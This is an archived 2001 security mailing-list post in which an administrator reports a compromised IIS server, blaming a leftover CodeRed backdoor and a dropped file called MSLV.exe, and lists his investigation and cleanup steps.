RE: MSLV.exe

From: Rob Keown (Keownat_private)
Date: Wed Nov 21 2001 - 18:54:14 PST

Next message: Paul Rogers: "Forwarded mail...."

Previous message: Jeff Anderson-Lee: "Re: [unisog] MS-SQL Worm?"
Maybe in reply to: Rob Keown: "MSLV.exe"
Next in thread: Marco Slaviero: "More ssh attempts"
Reply: Marco Slaviero: "More ssh attempts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Here are the facts:

1. I belive the host was compromised by CodeRed in September. Admin cleaned
the system, but did not remove root.exe from IIS's INETPUB/scripts...this is
how the exploit was accomplished.

2. IDS software was installed on the host in late September.

3. On 11/17 the system failed, was rebuilt (perhaps without IIS
patches...not sure), but the IDS failed to start. This might be why the
system was vunerable but unexploited until this time.

4. Today a file called MSLV.exe was installed from a blackhat and appears to
have code similar to SubSeven and Nimda. This is a very preliminary
statement.

5. Other reputable users on this forum requested the source and are
disassembling it. One initial report that it is a valid exploit led to this
post.

6. We took a system snapshot of the system and are looking at logs. We
removed the system from the network and cleansed it. Will monitor it
closely.

7.  This isn't a small- medium- or large- scale problem at this time. Just
sharing some info.

Will let you know if this is something we should worry about. 

Rob Keown




-----Original Message-----
From: Rob Keown [mailto:Keownat_private]
Sent: Wednesday, November 21, 2001 5:58 PM
To: incidentsat_private
Subject: MSLV.exe


I am in heads down mode investigating an infection. The culprit is a file in
root of c: of an NT4 SP6 machine supposedly patched IIS.

MSLV.exe is in the root and contains Nimda-like exploit strings.

Don't have time to go into detail. Can't find reference to mslv.exe
anywhere.

Anyone know of this?

Rob Keown

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Paul Rogers: "Forwarded mail...."
Previous message: Jeff Anderson-Lee: "Re: [unisog] MS-SQL Worm?"
Maybe in reply to: Rob Keown: "MSLV.exe"
Next in thread: Marco Slaviero: "More ssh attempts"
Reply: Marco Slaviero: "More ssh attempts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Nov 21 2001 - 19:03:53 PST